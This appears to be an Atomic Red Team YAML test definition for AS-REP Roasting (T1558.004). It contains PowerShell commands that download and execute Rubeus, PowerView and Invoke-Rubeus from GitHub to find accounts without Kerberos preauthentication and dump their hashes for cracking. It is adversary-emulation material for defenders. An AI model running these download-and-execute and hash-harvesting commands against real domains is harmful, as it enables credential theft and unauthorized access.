Carrie Roberts
d4709021fb
* updating atomics count in README.md [ci skip] * wip * handle spaces in path * update readme * fix typo --------- Co-authored-by: publish bot <opensource@redcanary.com>
71 lines
3.2 KiB
YAML
71 lines
3.2 KiB
YAML
attack_technique: T1558.004
|
|
display_name: 'Steal or Forge Kerberos Tickets: AS-REP Roasting'
|
|
atomic_tests:
|
|
- name: Rubeus asreproast
|
|
auto_generated_guid: 615bd568-2859-41b5-9aed-61f6a88e48dd
|
|
description: |
|
|
Information on the Rubeus tool and it's creators found here: https://github.com/GhostPack/Rubeus#asreproast
|
|
This build targets .NET 4.5. If targeting a different version you will need to compile Rubeus
|
|
supported_platforms:
|
|
- windows
|
|
input_arguments:
|
|
local_folder:
|
|
description: Local path of Rubeus executable
|
|
type: path
|
|
default: PathToAtomicsFolder\..\ExternalPayloads
|
|
local_executable:
|
|
description: name of the rubeus executable
|
|
type: string
|
|
default: 'rubeus.exe'
|
|
out_file:
|
|
description: file where command results are stored
|
|
type: string
|
|
default: rubeus_output.txt
|
|
rubeus_url:
|
|
description: URL of Rubeus executable
|
|
type: url
|
|
default: https://github.com/morgansec/Rubeus/raw/de21c6607e9a07182a2d2eea20bb67a22d3fbf95/Rubeus/bin/Debug/Rubeus45.exe
|
|
dependency_executor_name: powershell
|
|
dependencies:
|
|
- description: |
|
|
Computer must be domain joined
|
|
prereq_command: |
|
|
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
Write-Host Joining this computer to a domain must be done manually
|
|
- description: |
|
|
Rubeus must exist
|
|
prereq_command: |
|
|
if(Test-Path -Path "#{local_folder}\#{local_executable}") {exit 0} else {exit 1}
|
|
get_prereq_command: |
|
|
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
|
|
Invoke-Webrequest -Uri #{rubeus_url} -OutFile #{local_folder}\#{local_executable}
|
|
executor:
|
|
command: |
|
|
cmd.exe /c "#{local_folder}\#{local_executable}" asreproast /outfile:"#{local_folder}\#{out_file}"
|
|
cleanup_command: |
|
|
Remove-Item "#{local_folder}\#{out_file}" -ErrorAction Ignore
|
|
name: powershell
|
|
elevation_required: false
|
|
- name: Get-DomainUser with PowerView
|
|
auto_generated_guid: d6139549-7b72-4e48-9ea1-324fc9bdf88a
|
|
description: |
|
|
Utilizing PowerView, run Get-DomainUser to identify domain users. Upon execution, progress and info about users within the domain being scanned will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
|
|
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -PreauthNotRequired -Properties distinguishedname -Verbose
|
|
name: powershell
|
|
- name: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus
|
|
auto_generated_guid: 8c385f88-4d47-4c9a-814d-93d9deec8c71
|
|
description: PowerSharpPack - Kerberoasting Using Rubeus technique via function of WinPwn
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Rubeus.ps1')
|
|
Invoke-Rubeus -Command "asreproast /format:hashcat /nowrap"
|
|
name: powershell
|